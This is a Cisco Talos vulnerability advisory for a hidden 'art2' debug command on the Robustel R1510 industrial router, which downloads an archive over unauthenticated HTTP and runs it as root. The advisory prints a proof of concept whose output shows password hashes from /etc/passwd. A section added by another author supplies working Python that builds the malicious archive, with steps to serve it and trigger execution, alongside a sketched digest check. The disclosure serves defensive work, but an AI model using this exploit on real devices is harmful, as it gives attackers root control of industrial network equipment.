CVE-2022-32585: TALOS-2022-1570 || Cisco Talos Intelligence Group


Summary

A command execution vulnerability exists in the clish art2 functionality of Robustel R1510 3.3.0. A specially-crafted network request can lead to arbitrary command execution. An attacker can send a sequence of requests to trigger this vulnerability.

Tested Versions

Robustel R1510 3.3.0

Product URLs

R1510 - https://www.robustel.com/en/product/r1510-industrial-cellular-vpn-router/

CVSSv3 Score

9.1 - CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H

CWE

CWE-489 - Leftover Debug Code

Details

The R1510 is an industrial cellular router. It offers several advanced software features, such as OpenVPN support, cloud management, a data over-use guard, smart reboot and others.

The R1510 exposes an SSH service. Instead of providing a Linux shell, however, it presents a CLISH shell, whose available commands are defined through XML configuration files.

Here is the prompt after logging in as admin:

ssh [email protected]    
([email protected]) Password: 
# 
!              Comments
add            Add a list entry of configuration
clear          Clear statistics
config         Configuration operation
debug          Output debug information to the console
del            Delete a list entry of configuration
do             Set the level state of the do
exit           Exit from the CLI
help           Display an overview of the CLI syntax
ovpn_cert_get  Download OpenVPN certificate file via http or ftp
ping           Send messages to network hosts
reboot         Halt and perform a cold restart
set            Set system configuration
show           Show system configuration
status         Show running system information
tftpupdate     Update firmware or configuration file using tftp
traceroute     Print the route packets trace to network host
trigger        Trigger action
urlupdate      Update firmware via http or ftp
ver            Show version of firmware

# 

A hidden command, art2, exists in this menu even though the help output above does not list it:

# art2 
String  Version of art2
#

When it is called, the following shell script is executed:

#!/bin/sh
#build temporary directory

if [ $# -lt 1 ]; then
    echo "Usage : $0 <Version>"
    exit 1;
fi

VER=$1
DIR=/tmp/art2
if [ ! -d ${DIR} ]; then
        mkdir ${DIR}
fi
cd ${DIR}

#download art.ko and nart.out

rm -rf *

wget http://192.168.0.10/r1510ArtFile.tar.gz

tar -xzvf r1510ArtFile.tar.gz

#change mode of art.ko and nart.out, add execute ability.
chmod 755 r1510-art-factory-${VER}.ko r1510-nart-factory-${VER}.bin

[...]

#start art application
./r1510-nart-factory-${VER}.bin -console

This script downloads r1510ArtFile.tar.gz over plain HTTP from the hard-coded address 192.168.0.10, unpacks it with tar and then executes the r1510-nart-factory-${VER}.bin it contains. Nothing is authenticated or integrity-checked along the way: there is no TLS, no signature and no pinned digest, and the archive members are extracted and marked executable exactly as received. Whoever controls the host that answers at 192.168.0.10 therefore chooses what the router runs, and since the CLISH session runs as root (as the whoami output in the proof of concept shows), this yields arbitrary command execution as root. Because reaching art2 requires an authenticated CLISH session, the CVSS vector carries PR:H.

Exploit Proof of Concept

Below is the execution of art2 with 0 as its argument, with an attacker-controlled host at 192.168.0.10 serving an archive whose r1510-nart-factory-0.bin is a small shell script:

# art2 0
# Connecting to 192.168.0.10 (192.168.0.10:80)
r1510ArtFile.tar.gz  100% |***************************************|   171   0:00:00 ETA
r1510-nart-factory-0.bin
[...]
root
root:$1$ciDDcCQI$ksDdbx2gX84EQfRCUxKGA/:10933:0:99999:7:::
admin:$1$0Y1zMICY$2676GjK83hpbydoXDggR8/:16506:0:99999:7:::
bin:*:10933:0:99999:7:::
daemon:*:10933:0:99999:7:::
adm:*:10933:0:99999:7:::
lp:*:10933:0:99999:7:::
sync:*:10933:0:99999:7:::
[...]

Inside r1510-nart-factory-0.bin there are two commands, whoami and cat /etc/passwd. The whoami output (root) confirms that the downloaded file runs as root, and the account listing that follows carries the password hashes, so the hashes of the root and admin accounts are directly readable.
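To make the attack path concrete, here is an added example (my code, not the Talos proof of concept and not Robustel's script) that builds the attacker-supplied r1510ArtFile.tar.gz the art2 script fetches and shows, alongside it, the pinned-digest check that the script lacks. The archive and member names and the version argument 0 are taken from the script and the proof of concept above; the digest check, the helper names and the empty placeholder .ko member are assumptions for illustration, not a vendor fix.

```python
"""Added example: build the archive the art2 script fetches and check it.

Not code from the Talos advisory or from Robustel. File names follow the
script on the page; verify_pinned() is a hypothetical hardening.
"""
import hashlib
import hmac
import io
import tarfile
import time

ARCHIVE_NAME = "r1510ArtFile.tar.gz"   # name requested by the script's wget


def payload_script(commands):
    """Shell script standing in for r1510-nart-factory-<VER>.bin.

    The script starts it with '-console'; a shell script that never reads
    $1 simply ignores that argument, so any command list works.
    """
    return "#!/bin/sh\n" + "\n".join(commands) + "\n"


def build_archive(version, commands):
    """Return gzip-compressed tar bytes with the two members the script names."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w:gz") as tar:
        body = payload_script(commands).encode()
        info = tarfile.TarInfo(name=f"r1510-nart-factory-{version}.bin")
        info.size = len(body)
        info.mode = 0o755          # the script chmods anyway; set for clarity
        info.mtime = int(time.time())
        tar.addfile(info, io.BytesIO(body))
        # Empty placeholder so the script's chmod of the .ko does not fail
        # (assumption: the genuine archive carries a kernel module here).
        ko = tarfile.TarInfo(name=f"r1510-art-factory-{version}.ko")
        ko.size = 0
        ko.mtime = info.mtime
        tar.addfile(ko, io.BytesIO(b""))
    return buf.getvalue()


def members(archive_bytes):
    """Map member name -> TarInfo, i.e. what 'tar -xzvf' writes into /tmp/art2."""
    with tarfile.open(fileobj=io.BytesIO(archive_bytes), mode="r:gz") as tar:
        return {m.name: m for m in tar.getmembers()}


def executed_member(archive_bytes, version):
    """Contents of what './r1510-nart-factory-${VER}.bin -console' would run,
    or None when the archive has no member for that version."""
    name = f"r1510-nart-factory-{version}.bin"
    with tarfile.open(fileobj=io.BytesIO(archive_bytes), mode="r:gz") as tar:
        try:
            f = tar.extractfile(name)
        except KeyError:
            return None
        return f.read().decode() if f is not None else None


def sha256_hex(data):
    return hashlib.sha256(data).hexdigest()


def verify_pinned(archive_bytes, pinned_sha256):
    """The check the script lacks (hypothetical): accept only an archive whose
    SHA-256 equals a value baked into the firmware. Constant-time compare."""
    return hmac.compare_digest(sha256_hex(archive_bytes), pinned_sha256)


if __name__ == "__main__":
    # Same two commands as the Talos proof of concept; serve the file at
    # http://192.168.0.10/r1510ArtFile.tar.gz and run 'art2 0' on the router.
    data = build_archive("0", ["whoami", "cat /etc/passwd"])
    with open(ARCHIVE_NAME, "wb") as fh:
        fh.write(data)
    print(f"wrote {ARCHIVE_NAME} ({len(data)} bytes), sha256 {sha256_hex(data)}")
    print("members:", sorted(members(data)))
```

Run the file to write the archive, then serve that directory from whatever host answers as 192.168.0.10 (for instance `python3 -m http.server 80`); `art2 0` in the CLISH session fetches and runs it. The mode bits in the archive are only for completeness, since the script runs chmod 755 itself, which is also why a plain shell script is enough. verify_pinned() illustrates the minimum check a download-and-execute helper needs; the real fix is not to ship a factory-debug command in production firmware at all.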

Timeline

2022-06-27 - Initial vendor contact
2022-06-28 - Vendor Disclosure
2022-06-30 - Public Release

Discovered by Francesco Benvenuto of Cisco Talos.
